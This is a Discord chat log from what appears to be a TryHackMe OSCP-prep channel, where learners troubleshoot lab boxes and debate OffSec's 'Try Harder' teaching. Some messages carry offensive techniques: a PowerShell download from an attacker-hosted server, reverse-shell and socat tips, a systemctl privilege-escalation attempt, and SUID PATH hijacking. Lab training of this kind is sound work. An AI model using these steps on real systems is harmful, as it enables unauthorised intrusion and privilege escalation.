#offensive-pentesting-path
yeah i had to submit a few
Side note, I'll need to make a part 2 for that room whenever I can get GMON to work
Anyone else having the issue where the "Proving It" category shows as unfinished even though all the rooms are 100% in that section?
Can you send a screenshot?
Want a DM of it?
Anyone got issue with VPN today? I am not able to ping machines
Been fine for me @slim flower
Are you using Linux?
Also, this conversation would be better over in #site-support
Kali on my VMware, Windows on my VMware and also tried the TryHackMe Kali machine (online one)
Mind switching over there?
none of them worked
@spark iron are you available for an issue i am experiencing with hackmountain
drop me a DM @gentle glade :))
hi all, I just finished Kenobi but I'm missing something in priv esc. Can someone give me some explanation?
@fathom rapids If you DM me with what you did, I'll explain it to you
Anybody having any issues with getting HackPark to deploy?
I have an issue with Alfred. Anybody else? Exploit is not returning shell. (solved: https://www.pwndefend.com/)
@spark iron https://tryhackme.com/room/windowsbof
Might be worth mentioning which room that is @robust loom
Updated
I think that's Spopy's room, and it's being fixed atm
@toxic temple it is but he said to "speak" to skidy
Hello all anyone rooted Alfred without meterpreter?
I'm trying with powersploit
No chance there
Question everyone. In OSCP, if one buys the course, do you own the training material and videos, and is it possible to review again after subscription expires? Or if review is necessary, do I need to buy the course again?
Sorry, I need to clarify. I am talking about the OSCP material.
Yes, you can download the course PDF, and view the videos (maybe download them? I'm not sure on that one)
You own them as they have your name plastered all over them
OK, that's good. Just like Cisco ebooks, they have my name on them. Perfectly OK with that since I wasn't planning on sharing it!
I am doing the ePTS (along with THM) and eLearn allows me to read and view the videos offline. I wanted to know if OSCP is the same way.
Yeah
It has your name, student ID and other stuff on it, so they can trace it back pretty easily
so I found a mistake: I ran nmap with -p- on Kenobi and found X number of ports, but the room expected Y number of ports. I could not have guessed without looking at the hint for the limited command that I was expected to run. That being said, this is awesome and affordable, and thank you
@weary briar yea they give out all the materials offline
Hello all anyone rooted Alfred without meterpreter?
Anyone?
@rigid gyro i found a few of the port questions had different results....
i did however misread one of them
yeah some few things here and there, but overall i am very pleased, just needs a little polish
there is one question regarding num of open ports in Brainstorm which doesn't take the correct number
there you go
just finished kenobi - very cool little lab
Hey! Just enrolled into the OSCP path (& TryHackMe in general), passed the first room quite easily ^-^ Anyone who passed OSCP can testify to how useful the path was? I have 10 weeks to prepare & took a 2 months lab but I'm a nervous kind
If you've already booked, the path is useful, but PWK labs will do you better as they are the official labs for OSCP
Yeah sure, I don't expect the path to "replace" the actual training
the path is a good aid to get people moving. it's more guided than the PWK is
yes i can echo the goodness. I just spent three months in the PWK lab and it was nice to rejog the memory on some things before my exam. The VMs keep crashing on me though; it's really frustrating. Don't think the servers are capable of the increased load that's been put on them recently with the rapid growth of the platform. Put in a feedback ticket and the CEO emailed me directly and promptly, which was very cool. The issue hasn't been resolved but it's nice to know that my feedback went noticed at all. Kudos on the customer service piece. Carries a lot of weight imo.
@final vault Oh nice dude, did Nick give in and purchase it for you?
I wish
Did anyone find the root.txt file on Alfred?
anyone have any resources on uploading files via netcat once I have a reverse shell established? Trying to avoid meterpreter
Once you've got a reverse shell there are a bunch of ways you can do it @haughty relic. Can you use wget?
hmm nope no curl either
Which box is it? I'll check my notes and see if I've done it
You can use nc to receive files
That... would be the obvious solution. Ta @fleet wedge
or powershell
I'm having some issues with gamezone
Yeah powershell iwr would work too
it sometimes freezes the connection and gets my ssh stuck
Is your attacker a linux box @haughty relic
You can host files using SimpleHTTPServer
And use powershell iwr <your ip>/<file> -OutFile <what you want to save the file as>
ok, cool. Thanks for that, super useful
my windows game is super weak
Yeah it helps to know some powershell commands
https://underthewire.tech/ can help you learn the basics @haughty relic
aaah powershell iwr is successfully hitting my webserver, server is registering a call, returning 200, but for some reason the file isn't present on the windows box afterwards
anyways not asking for help, just venting lol
Do you have write perms to the directory you're in @haughty relic
If you don't have write perms it won't save
ty, will try that
figured out what I need btw
got root right when my machine expired before I could get the flag tho so I just took a break lol
this machine has been killing me all day
god help me on oscp
Good job! @haughty relic
I just hit lucky, think I'm paying for oscp and starting it asap
Bounty?
Yeah
ayy
Really wanna get disclosure for this but doubt I will
h1?
yeah
gl on that one 
Can't wait for the "Marked as duplicate" 2 days later
Yeah I'm not sure I believe this yet
I was literally about to go to sleep as I hadn't heard anything
and have work in like 5 hours
is hackpark a bit unstable?
Fingers crossed @final vault that's a mighty nice find if so!! gratzz
Yeah waiting on payment to clear and I'll be jumping onto the oscp hype train
You could book OSCE at the same time kekw
Think I'll fail oscp before I go for failing that too
morning all
o/
Anyone working on steel mountain rn?
Hackpark is one @#$%#$%!@ frustrating box...if this is anything like oscp I am doomed
I can get as far as a windows shell using the exploit but get completely stuck on transferring files over to the windows host via netcat session. When I think I've maybe uploaded the file I suddenly start seeing incessant scrolling like this and can't get anything done:
I then have to redeploy and bang my head at this point again
just finished hackpark yesterday
i used powershell rather than netcat
just finished steel mountain!
I've also seen mentions of powershell, but, how are folks leveraging it for hackpark?
nm I think I see
BOOM
You do it @desert bloom?
yep - had to find a writable directory
Good job!
thanks!
figured it out, definitely learning some painful lessons but hopefully will get better and better
The pain means that you're learning! @haughty relic
took copious notes on HackPark - it was worth the frustration, but, walking away from it for 3 hours helped!
Only lingering question was Task 4, Q 3. I made a really good guess on the answer, but, if anyone can help me understand what was 'abnormal' about that service, I'd love to know the correct way to determine that. Finished the lab and my brain is tired. good night!
Sheeeb
Hi All, has anyone here done Buffer Overflows room, have a quick question regarding task8
I'm attempting them now
I got so far on the second one but got stuck on the first one.
OFFSEC security updated their OSCP exam and it looks like Metasploit is on the syllabus. Is Metasploit still banned for the OSCP exam?
I don't think the Exam has been updated only the course material. As far as I am aware the rules still apply about the usage of Metasploit in the exam.
we'll be updating the OSCP path to change the use of metasploit to suit the syllabus more
thank you, i did notice that a lot of the labs ask you to use meterpreter/metasploit. It would be nice if the manual exploit was explained as well since we can only use msf/meterpreter once in the exam
anyone here complete alfred manually or did yall use metasploit?
Have to agree on that. Don't get people into bad habits with the path or it may backfire on some people
Probably a result of backporting standalone rooms for the path
@autumn field did you figure out task 8? i'm stuck
@rancid canyon same. since yesterday haven't done much. I think I'm missing out something, during the debugging I see that the instructions are executed, but during the run-time it still segfaults. I'm using gdb with unset variables.
i can get a shell without segfaulting but it doesn't do what it needs to do
in my case, when a provided payload syscall instruction is executed (during debugging) nothing happens and it continues executing the instructions until it bumps into AA..'s , so I thought if the address is correct, during the run-time it bumps into AA..'s. However if the address is wrong, then it fails because I'm pointing to a wrong location. I'm trying to figure out whether I'm actually using correct address :)) Will look into it again in few hours
If you're segfaulting it probably means your return address is wrong (assuming your shellcode is valid). I found a script that helps keep the env consistent when invoking the program with and without gdb, that way the return address you find in gdb will work when running without gdb. DM me if you want that hint.
some one can help with alfred machine?
@minor oyster What are you stuck on ?
I could not find it either so asked in the main room channel. https://discordapp.com/channels/521382216299839518/522158539129618453/682958335980339221
@minor oyster try migrating processes. Even if you're NT SYSTEM, that process itself may not have full privs
Hackpark is so frustrating. I can't get my meterpreter shell transferred. This box is so borked
What bit ya stuck on?
Getting an upgraded meterpreter shell. I FINALLY got the shell.exe transferred over to the windows box and now it just won't execute. I have the meterpreter listener running on my machine, but the meterpreter payload that I transferred to the victim machine just doesn't do anything when I try to execute it
Feel free to DM me too if you wanna provide screenshots of what you've tried and what's not working
@everyone
sorry for the massive ping - we want to collect feedback on the path. We know that various rooms have had particular issues and we want to aggregate those issues and fix the rooms as quickly as we can. We'll be releasing a better way for keeping track of issues on room (but we'll use this for now)
Please take a few minutes to fill in this feedback form:
https://forms.gle/HeN5BgaKXrkJnaL49
We'd also love to hear your thoughts about the OSCP pathway in general and how it has/hasn't helped you
btw: we're also giving $50 (randomly allocated) to someone who completes the survey
If you have more comments, feel free to get in touch with me
i can fill after oscp exam ty
Freak off
Um, @hasty sentinel , how do you plan on getting a hold of people who fill out the form?
yeah lol
Haha!
Lollll
Wish there was an option of "did not take exam". Now you're getting an answer saying the path didn't help me haha
Ahsu when will you add a profile picture
that question is optional
Oh, derp. Well sorry for the bad addition to the stats
added
capital w reeeeeeeee
aha i'm not sure what to put for my profile picture
A profile picture, or the question @hasty sentinel?
Right, we gotta find Ashu a profile picture. Shibe @fleet wedge?
So should the form be filled out a second time if you filled it out without the question of your username?
I guess only if I want a chance for the $ yeah?
Hehe, go look in #creators-lounge Ashu...
What about Wallace from Wallace and Gromit
Or Gromit from Wallace and Gromit?
what's that hmm
@fleet wedge Please, please, please add a !shibe into the bot...
I'll add a !spaniel too
quickly adds something weird
I think it'll work
Where I have a bunch of spaniel.pics
In a dir
And the bot chooses a random one
Aye, that's the safe option...
I dun trust google images
I need to take a look at the bot code actually. Never tried Discord botdev. Might set up a server just to give it a shot
Uh, yeah, point...
@restive hamlet u got any shibe pics?
@chrome valve It is scarily easy. Never touched the API and made an UwU-ifier in <30 minutes at a workshop at a hackathon
Yeah discord libs are really really easy
Hmm. Definitely worth looking into then
If you know python you can do just about anything
Might look at the TryHackMe bot. It's on Github right?
Mhm
First language
You want the bot-dev role
That an offer or a statement?
Yes
lmao
That... didn't answer the question
woah
Well, that works too
Thanks Pars. I'll go have a look
Proves if you don't ask you don't get lmao
I didn't ask...
Still got
all you gotta do now is submit a PR fixing one whitespace or something
just make sure you leave enough grammar mistakes for the rest of us to fix :^
@fleet wedge no?
Why don't you
Steel Mountain Done...wondering if I should have done the easier rooms in the "proving it" section first before trying Hackpark
anyone web pentesting professional?
hey anyone can help me with hackpark? just have some questions
@orchid jasper I completed it except for question 4, task 4, so feel free to ask me anything
mmm anyone who completed Steel Mountain can clarify one point to me?
hey all, new member here, starting oscp labs Saturday (3rd attempt), htb member. anyone else get here from John Hammond's vids? lol
@hot shoal i don't have enough money to take the course haha
Has anyone done the OSCP Path and did it help with the OSCP exam?
My exam is in a month and I am about 50% through the path right now, i will let you know lol
@hard shoal Do the path without ever looking at a writeup, and you have a high chance
Also don't use metasploit ever
Cool thanks
Got my exam soon so anything that helps me prep is awesome.
I didn't complete the OSCP path, but I start PWK labs this Saturday.
nice!
@normal sluice good luck!
Pm if need help for hackpark any1
sure @fleet wedge
I am trying to start hackpark but I can not access it. Not even after waiting 5 minutes.
nevermind, I was too impatient I guess, I got a connection now
@fleet wedge01#3602 dm me, I completed it except for task 4, question 4
@alpine peak did you answer to question 4, task 4?
@haughty ruin You should do, are you connected to the VM?
gamezone.
trying to crack the hash I receive this output: No password hashes left to crack (see FAQ)
do you know why
any linux masters here
What do you mean by linux master @fleet wedge?
If you've got a (relevant) question, feel free to just stick it in the chat.
I dont know how to solve a mission in linux
and my SSH connection is not working anymore through PuTTY? Maybe anyone can check?
Are you defo connected?
Do you have two VPNs running?
Is the machine still alive and up?
Deploy that room and access the web server
Just to double check it's not you
it's not starting after clicking on deploy
Try refreshing the page
it's the same issue as yesterday, machine is not booting up
And it just hangs nothing happens?
only if i may have any other open sessions
nope
What's your THM username?
xande30
it's on
Can you access the machine you deployed in the OpenVPN room?
It's showing me that the machine is running
Refresh the page
Under the graph, there should be a red box that says "Active Machine Information"
yep
And what other room won't let you deploy?
let me try once again, I see the IP changed
nope it's not working
i need to perform this task
not working
are you sure the ip is 10.10.10.10?
shiba1?
Who is that?
Screenshot the red "Active machine information" under the graph for this room
10.10.10.10 doesn't exist
You need to use the IP given to you in the Active Machine Information
Screenshot the red "Active machine information" under the graph for this room
Please do this ^^
ah ok
so the ip is
10.10.24.61
are you sure the username is correct?
that's the one i chose
You can't choose a username, it has to be one that is set up
ah ok, my bad
Can you link me the room please?
I thought you were doing another room
@fleet wedge that room is funny with PuTTY
When you connect to it, try just putting the IP in then clicking enter
it worked a while, then it just disconnected me
there's no deploy option
for room
?
it's a free room
where's the IP and deploy?
Does the room have a machine to deploy?
idk
it's Learn Linux zth
I can't find the deploy option, as for the questions we need to interact with the machine
hey, in that last one do I have to do the priv esc?
like linpeas... ?
@spark iron
@fringe pasture Is this zthlinux?
yea
All the commands you need to find the flag are in the room - no priv esc necessary
Mhm
Yes, you need to do a privesc (of sorts) but it's not a vulnerability per se
All the tools you need are already in the room
like linpeas ?
Nope
Literally just what Pars was teaching you
Everything you need is in that room
yea they say the flag is /root/root.txt
Mhm
which gives perm denied
Think laterally, @fringe pasture. You can't get it directly, so look for other things first
But that doesn't mean it's a conventional priv esc
k so I'm user shiba4, from there we need to get root or is there any other acc?
@fringe pasture what you need was actually mentioned in a task in the room
So if you're completely in doubt you can go back through some of the tasks :)
yea
And those different users will have different permissions to certain things right? Like in the tasks you've completed
Mmhmm, so go exhaust every possibility. You've not tried those accounts, so try to get into them
And yeah, all the tools you need are taught in the room. Linpeas doesn't do anything (been there, tried that)
^^
Lol
Put it this way. You're enumerating just now, so which of those tools are best at looking for stuff
There ya go
Mmhm. Happy hunting!
!rules
No unsolicited direct messages (DMs) to other members of the discord. This includes staff. Verify that the member you are messaging is ok with you sending them DMs.
No personal drama or drama from any other discord community is allowed to be brought into this discord. This is a space for infosec discussions and learning, keep it that way.
No excessive self promotion. Linking to another discord server is strictly prohibited, just don't turn it into advertising.
Keep it civil. If action is necessary in a dispute or any other sort of disruption on this discord, punishment will be doled out evenly both to the individual(s) who started the issue and to those who reacted inappropriately in their response.
No cheating is allowed whatsoever within this discord. Any cheating (other than specifically within a developmental environment where it has been preapproved by staff) will result in an immediate and permanent ban.
Racism is not tolerated and will result in a permanent ban.
Administrators reserve the right to modify the rules at any time and extend them accordingly to cover infractions which may not be currently included in these rules.
Keep conversations SFW (Safe for work). This is an educational and professional environment, be sure that your words do not offend or make other members uncomfortable.
Does that work?
If you want to get some help in dms please ask the members if you can dm them
Oooh, that works
handy to know that works
Yep
Mhm
@chrome valve @fringe pasture Can anybody DM to help me with the last step? I feel like I'm close but... still stuck.
DM with what you've tried so far @long pendant
@chrome valve Thanks all for the help.
hi
anyone can help me with this task ?
[Task 21] Binary - shiba2
from Linux Room
Switch over to #room-help, then yes, sure
I'm working on the Blue box, I've run ms17-010 before but it's failing. I ran it yesterday on the box but my VPN connection dropped so I lost shells. Now I can't fire the exploit again?
Should I be running it manually?
Yeah Blue is a little dodgy
Will be made clear once "Known Issues" have been added to THM Room tabs:)
How many machines are on the OSCP path?
Is it the same issue for everyone?? Like the connection just drops when you try to load the post module?
Thanks will try :)
@spark iron hi
hi
@spark iron how many machines are in the OSCP Path please?
That's amazing, thanks
No worries
@spark iron will be taking it after my Virtual Hacking Labs
Awesome, no worries
hey
hi guys, is there someone who completed gamezone?
I've completed most of the OSCP labs, are there any others that are worth doing? Got my exam coming up soon so trying to get in as much practice as possible.
Hehe. Annoying though they are, are they really helpful for OSCP?
They're useful for research practice
If you're after some fun, go try them though @hard shoal -- admittedly, I'm biased
True...
Cool will take a look
You're not wrong there
howdy
practicing burp using OSCP learning path... but no matter what I do, "intruder" does not work or is not able to identify the proper extension
can someone help me?
I am using "sniper"
Not even a simple payload / single extension works
if you're only testing for .phtml and it's wrong then maybe it won't return anything
I assume this is an upload too right?
Unless you know for certain it's .phtml in which case you can just upload a phtml file
hi there
well, the exercise is to find acceptable extensions
I already know the acceptable extension (not using burp) but can't make burp work
that's actually the right extension, I just deleted the previous file to troubleshoot and leave that one, still does not work
Fixed! the "URL encode" option was my problem. I unchecked that and it worked
hola guys, I started Skynet. The hint is ||to enumerate samba|| but if I hadn't seen the hint, idk how we could know we have to enumerate for that. nmap shows only ||port 53 tcp open||
any advice?
You may have nmapped before all services were open
what do you mean
Rooms take a while to setup
So if you ran your port scan early it may not show all results
I have not worked on that one yet, but how are you looking for it? via the "locate" command?
if that's the case, run updatedb to refresh the database
or try find / -iname root.txt
@brazen tiger you need to migrate to a system process
I'm stuck on the priv escalation part of Vulnversity
Have you found the special binary @fleet wedge
I know I can execute a given file with elevated priv
Have you found that file?
got a low priv shell
Yes, I know is one that has suid
Then you should research
How to priv esc using that binary
Infact
The THM bot has a command that can help you
I did, created the file that's supposed to give me root but nothing
hmmm
Play around with what you're told to do
THM bot?
||are you using GTFO bins||
sorry, no idea what is that
It's a site that gives you information on how to priv esc using certain binaries
Let's go over to #bot-commands @fleet wedge
argh... lost the shell .. ... and IP vanished
the machine went off... this is the 2nd time it happened
I guess I will leave it for today... still stuck on priv escalation for vulnversity
part of the problem is that I can't even use nano. And even when creating a file with "echo", the file does nothing after I try to execute and get a root shell
Why can't you use nano
@fleet wedge
I get an error
$ nano test.txt
Unable to create directory /var/www/.nano: Permission denied
It is required for saving/loading search history or cursor positions.
Press Enter to continue
Ye
But you can still use it
Do you have a proper shell or a reverse shell
well, I don't know how
I have a low priv shell
I just need a root shell
Reverse or proper tho
reverse after uploading a file to the webserver
Then I recommend
Downloading a static binary of socat
Onto the server
And using that to get a shell
Yeah but that's still iffy with nano @final vault
Socat just works
And that's what I like about it
could always just create a python pty shell
@final vault did that, still nano does not work
could always just make it on your machine
An option^
an upload via nc?
I am trying to follow this: https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
not sure if that's a spoiler
You have curl and wget I assume
have not checked
I guess
I will try to use nc or python webserver and upload
maybe tomorrow, I am tired... but am I on the right direction?
Yeah take a break for now
You've got the right idea
Maybe some sleep will clear the head
9pm here... agree.... time to play some PES2020
LOL
Thank you all!
Cheers
<3 @fleet wedge
If you can't get a shell back, upload a suid C program and use the exploit to change the owner and suid to root
I couldn't seem to get a working shell from systemctl exploit so had to do that
.sudo_as_admin_successful - why I can't view this file
@fleet wedge what's your question, exactly?
DM me if you still need help
No
I finished the room
Good job
can someone clarify a thing for me on burp's sniper attack?
@fathom rapids what kind of questions do you have
Can I get a hint on "What file server is running?"... I know the name of the service, but what do they need me to fill in there
Steel Mountain
Also name of the server
@fleet wedge maybe you can help me with this question?
@glad silo are you providing the name of the protocol or the name of the service
I'm providing Server Name with Protocol as the first word. I know that I'm missing something here, can't figure out what...
DM me your answer @glad silo
What's the purpose of upgrading the shells in metasploit in task #3, for "Blue"?
I did it but I don't see the point. Doesn't the initial Windows shell that was obtained run with high privilege? Why do we need to create a 2nd session again? Maybe I misunderstood the exercise or I'm missing something
I am stuck on priv escalation of Vulnversity :/
after 4 hours, I gave up and followed write ups, but I keep getting the error below
www-data@vulnuniversity:/opt$ /bin/systemctl enable --now $priv
/bin/systemctl enable --now $priv
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.rkdS8byk8r.service to /tmp/tmp.rkdS8byk8r.service.
Failed to start tmp.rkdS8byk8r.service: Unit tmp.rkdS8byk8r.service is not loaded properly: Invalid argument.
See system logs and 'systemctl status tmp.rkdS8byk8r.service' for details.
@blissful nest do you understand why and how you need to elevate the priv?
Feel free to PM me if you still need help with Vulnversity
for vulnversity did anyone else not have access to the website? gobuster scan was fine, i have a connection but when i enter the IP in the browser, I'm unable to connect. My session is still running and everything
I'm using the provided Kali 2020 box over RDP
I'm having trouble just scanning it
How long does the OSCP path last?
@fallen herald be sure the VM is up and running. And be sure you're using the right port / socket when typing the url
@lofty kite check nmap flags. If the VM is up and running, nmap will work just fine. But sometimes you gotta adjust nmap flags.
Yes
@blissful nest You can use whatever as long as its NOT a commercial tool or automate the exploitation process
has anybody done the gamezone box manually when it comes to privesc?
@narrow nexus each phase / step has an estimated amount of hours you'll have to invest. But if it will take more or less, I guess will depend on your commitment and expertise
I personally try to not rush the process so I can learn
@blissful nest you should try linpeas ;)
looks really awesome
thanks @jagged socket
I am beginner, here for such cool tips/tricks
@fleet wedge thanks a lot!
no problem mate, good luck for oscp! it's a great learning curve
after the overhaul, for sure!
@blissful nest np, enjoy. I'm also completing "OSCP path", so I'll be around here in case of further questions and I'm sure I may need help too
I need help on alfred, it's constantly timing out
even after building the project
also configSubmit is taking too long
Guys, I need a tip regarding lord of the root box
Should sqlmap provide me with some information or spit up garbage?
Because I cannot use it to exploit login form
Additionally - don't you think, boxes in OSCP Prep Learning Path should be prepared without need of sqlmap? It is banned on OSCP itself
there are multiple rooms which use sqlmap (example: CC Pentesting), but as i remember, there are rooms coming up about sqli
@wraith echo I'm pretty sure this has been acknowledged before and is something that is being worked on
It's also a choice to use sqlmap
for in oscp there are plenty of rooms which are vulnerable to metasploit modules. But it's down to the user to know how to manually exploit it or adapt a normal script to exploit
@final vault It is not in this case. I know that you can do everything manually, but in case of time based sqli it is not plausible for user to do this manually.
That's why if there is some SQLi on OSCP, it is a relatively easy one
So I think, that should be the path of THM OSCP Labs
@spark iron @hasty sentinel Probably the best two to see this. Some nice feedback on the oscp path
yeah good note :))
I'm in the process of updating the path
We're going to update boxes to include walkthroughs without metasploit
We'll look into adding a SQL injection box :))
hi team. What badge can I get after finishing the Beginner path
you get badges for completing rooms
see the list here
k
If you want to learn about manual SQLi you can either use proxy on sqlmap to study the requests in burp or go through the portswigger exercises on their website
Any one can guide me on hackpark ? hydra is taking forever
I cannot connect to any machine. I am using the VPN connection, I deployed the machine, yet I cannot ping or access any machine. I tried Hackpark and Steel Mountain
Are you defo connected?
howdy
Hackpark and Steel Mountain are both windows boxes. You won't be able to ping them, or use nmap without -Pn @sly fable
can someone please PM me and double check my john the ripper syntax for a password cracking task?
I'm 99.9% sure it is correct, but not working for the password cracking task for Blue
@chrome valve Yesterday I was able to access the website on Hackpark server. Today I cannot
Sounds like a VPN problem then. Try ps aux | grep openvpn
If there's more than one connection then you have a problem.
hi can anyone please confirm where to purchase the pro voucher
As a rule of thumb if you don't get an answer immediately don't then send the same question in every channel until you do
That's literally spam
Hey everyone, my hashcat seems to be working really slow. I am running it on a 1050Ti but my gpu shows only 1-2% usage. What could be the problem?
don't think it works from gpu automatically
should work through rockyou in like 40 seconds tho
I am running it on my windows machine, it's really slow, like 0.1% done in 10 mins
@digital sonnet if you're using a vm it won't go near gpu
and I have selected my gpu
Got it now... Thanks @obtuse scaffold
@chrome valve Worked after killing openvpn
pkill openvpn
That'd do it
Question ... on Kenobi, task#2 ... is it asking for distinct open ports? or the sum of UDP plus TCP open ports?
can someone please clarify?
It's all the UDP ports + all the TCP ports added together
I am sorry, but I think Kenobi, task#2, is wrong or the answer is not properly formulated
I do not agree with the proposed answer, and I've spent quite some time researching because I thought I was wrong, but I am not
For the Windows machine, where is the root flag located?
Hi guys, need help in Hackpark to escalate privilege, now i am having an MSF shell
@simple kestrel hi... help with ?
You mean , the issue with nmap answer ? For kenobi?
I'm positive the answer is wrong
there are more open ports on that box.
Yea let's chat in PM to not spoil
hi anybody can help me on BOX: https://tryhackme.com/room/hackpark , for these question i have ROOTED it
anybody there!!!!!!!
How have you rooted the box if you can't answer what binary you should exploit?
i have used the windows-exploit-suggester
and it gave me a priv esc with a metasploit module, so i have done that
Ok cool, I don't think that's the intended way but owning the box is owning the box.
Look at the hint as that helped me because it's not the program you think it is.
ha that's annoying
whether i should connect with the remote desktop to do that?
to open the event log
I think I connected via RDP as it made it slightly easier to review stuff.
@hard shoal Do you mind editing your post and removing the initial part? to keep the fun for others and avoid spoilers
better to PM people directly next time, and discuss details about a room that way, my 2 cents
Has anyone done brainstorm here? I'm stuck and not really sure why what I am doing is not working.
what's relationship between that SUID file in kenobi and /bin/sh and curl? I do not understand why we had to copy that to gain root, or why I ended getting root, if I never touched the SUID file. Can someone please explain that to me?
@fleet wedge SUID on a binary means when run, it takes on the permissions of the owner of the binary. When a binary is calling another file without an absolute path, it uses the $PATH variable to find that file, and that allows you to trick the SUID binary into calling your own fake curl that's located in the $PATH before the real curl. So the result is you can run your own file as root.
The attack would not be possible if it called an absolute path since the PATH variable would not be needed
Thanks. It's just that it is not so clear in the explanation / question that you have to inspect that file's content in order to modify the "fake" curl
There's an image but nothing tells you where the image came from, it's confusing, at least to me
I spent like 1 hr reading and re-reading till I finally got it
if you use strings you can see it's calling curl without an absolute path
Not the exercise, but where the image came from
@alpine peak Yes but it doesn't tell against WHAT you have to run strings
you use the find command to search system wide for SUID
The only file that you've been looking at for the task @fleet wedge
Why would it suddenly change focus?
In the first question of that task it asked you to find a file, which you presumably did
Yes?
Correct
I didn't write the questions, I just know what the machine contains
Well, given you already found the file, why would the questions suddenly be about a different one?
It's the context of the task
What suid does, what it is, etc, that's clear
Because it doesn't explain the attack vector and related to the image
I would have elaborated more in the explanation about where that image is coming from
I am mobile now so can't check
That paragraph is explaining how the attack works
yea, it doesn't have to be /bin/sh but I don't see the problem
However, I think that there might be a mistake there
@alpine peak, am I being stupid, or should the last sentence say /bin/sh, not /usr/bin?
yea, that's a typo
I'll throw it over in bugs
Thanks
The typo
I'm still not convinced there's a problem with the question
Although I'll ask for it to be reviewed as well
Well, I would rephrase the question but can't elaborate more until I get home
Guys I have a question. Let's say I know some basic XSS exploitation, WAF evasion, SQLi etc. I know more about web pentesting and I am very very interested in learning some linux/windows pentesting as well. Is getting the subscription and enrolling in paths a good idea to "learn" in your opinion? Or should I stick to books and hackthebox?
Just posted that in #site-bugs as well. It's the same question, if you read this Skidy
PWK by Offensive Security is the best, cert based training
PWK by Offensive Security is the best
@alpine peak For learning? Or for getting certified?
Learning
Yes, it's worth it though. PWK will teach you the most, but the THM stuff is really good too
well both
Good affordable option certainly
PWK is a lab env
THM?
@rare dock for learning? This site and VHL
haha this chan
Well PWK is a bit pricier than THM, so I'll grab it for now, and PWK will come next. How do you guys like eLearnSecurity courses?
I have slides for Penetration Testing Professional
very nice, in-depth info
I can share if ya want
THM is working on implementing full networks for pentesting training
OffSec material (old at least) is not good enough in my opinion
Its new
eLearning courses are great too, but this learning path is good so far, I like it
Yea, offsec knows what they're talking about when it comes to this subject, which is why I recommended them for training
Okay. Thank you very much guys!
@alpine peak i respectfully disagree. The cert is very good but its teaching material and methods, not so much
Compared to tryhackme and VHL, and eLearning, their training material lacks
They expect you to research on your own, hint the "Try Harder" motto
Depends
Again, not talking about the cert
I respect the cert itself but that's probably a conversation for another chat / room
They don't claim PWK is a beginner level course
And doesn't have to be
If you want your hand held, I would recommend something else
"Hand held" and proper training is not the same
The "try harder" method is most of the time people telling you ... try again
With no explanation whatsoever
Try Harder is proper training because the whole idea of hacking is to be in ignorance about the machine you're attacking
When you get into the industry, who is going to give you answers?
You can learn with proper guidance
You will always have someone or something you can rely on
But again, this topics is not for this room
Someone who actually can "Try Harder" you are correct
@alpine peak, am I being stupid, or should the last sentence say /bin/sh, not /usr/bin?
Thanks. Fixed :)
It's good to have a guide if you're a beginner, but once you get into it, you need to have highly developed enumeration skills for when blackbox pentesting happens. Getting answers creates a bad habit in my opinion, of giving up on something you can't figure out, and you won't always have someone to give you those answers
OSCP is a beginner / foundational course. That's how it is being marketed by OffSec
It's a buzz word
You keep pairing the concept "giving answers" with "proper training", they are not the same.
Pentesting is not a beginner level field
The best example, again, this site, virtual hacking labs
If you haven't seen it, enroll, or eLearning, then you may understand what I'm saying
There is a difference between real life and CTF machines. The OSCP path was developed from offsec
You can't give credit to the OSCP path without giving credit to PWK
I will go beyond, if PTP was much more popular, I can assure you people would be pursuing that one instead
And the main reason why OffSec copied and updated their material this year, which has already been done by eLearning
As an A+ "HR filter", OSCP excels
It excels literally because of "Try Harder"
My opinion is that PTP is way better
@alpine peak you know? Whatever man
Gotta go, let's agree to disagree
Yea, the ideals are just different, I just believe "Try Harder" because it worked for me
@alpine peak and that's a valid point
I hated the motto "Try Harder" when I was doing it because I was stressed all the time, but in hindsight, I agree with it
@alpine peak oscp is a beginner level training and cert. I agree with @fleet wedge, try harder is not a training method. Concepts need to be explained and demonstrated. Training is meant to fill gaps and just saying a phrase does not help fill that gap.
@simple kestrel the most important skill in hacking is research. You need to be able to learn for yourself -- look things up. Teach yourself.
Nothing good comes from being spoon fed. Not past the training wheels anyway, and OSCP makes no claim to be an introductory certification.
Try Harder is very much a training methodology, and it's the mindset that we all need to adopt if we're going to get anywhere in the real world
They literally say those new to infosec or pentesting should start here
Try harder is crap. I agree that a pentester should be able to research. But if you have a training class, telling someone to try harder is not a training method. It is a gap in your training.
If it was an advanced class or training then yes I could see that.
oscp is like a medium rated beginner cert
Or something like we taught you reflective xss figure out how to do stored
Most pentesters claim it to be easy but you still need a basic knowledge to finish it. Just raw dogging pwk won't be enough
It's not, it says intro to infosec. Go look at the site
It's foundational for penetration testing -- literally one of the most advanced fields in computer science. I quote here, it's for "those seeking a step up in their skills and career".
That's not to say that it's necessarily hard, but it's also not designed for complete beginners
It's designed to train you how to think, and how to use the tools on offer
It's not there to hold your hand
Foundation
Notice that it's not a foundation for Linux. It's not a foundation for computer science. It's not a foundation for basic concepts
It's a foundation for penetration testing
You can't do pentesting unless you're already pretty damn good with computers -- that's literally the original definition of a "hacker": someone good enough to make computers do stuff they ain't meant to do
unfortunately pentesting isn't a competency that a regular cs student will know without exposure. It requires dedication
I'm on the kenobi box but there is no SSH key in the /tmp directory?
Exactly that ^^
I agree @final vault but if you are teaching a foundation class then you need to teach all the concepts.
Man I can't justify it any more than I or muirland has.
@signal pumice pretty sure you need to move it there yourself
just because it's foundation doesn't make it easy
I'm a fucking idiot, cheers
I'm sure the foundations of nuclear fusion isn't easy
Good way to look at it
No
You can't have a foundation to an advanced topic without building on prior knowledge
You had to learn about atoms in order to do nuclear fusion
You've gotta learn a lot more than that...
That's what I am saying
Oh good, so we're agreed? A foundation for an advanced topic needs prior knowledge?
Read only FS
Yes, and you have to learn about networking fundamentals, software dev and an understanding of at least every part of CS to do pentesting
Again, everyone's opinion is different on this.
So again they can't tailor a course to spoon feed that
No. That isn't an opinion, mate.
That's a fact of life
Having a training class means that you are training people. And that includes concepts. If people are complaining then you have gaps in your training
Pentesting is built on top of everything
It's literally based on a mastery of computer science
hence the salaries
At the end of the day this isn't school anymore, pentesting is something we have all chosen to pursue, whether for fun to participate in CTFs or to do it as a career. No one forces you to learn however it is a choice to push yourself to succeed
No one in life will give you 100% coverage on everything. PWK is known to give a decent understanding of what is expected, however there will be gaps. Those you should know you have to find out yourself and push to understand them
You might struggle with how the material covers those topics. Well, bad news, time to find another source and try to understand it
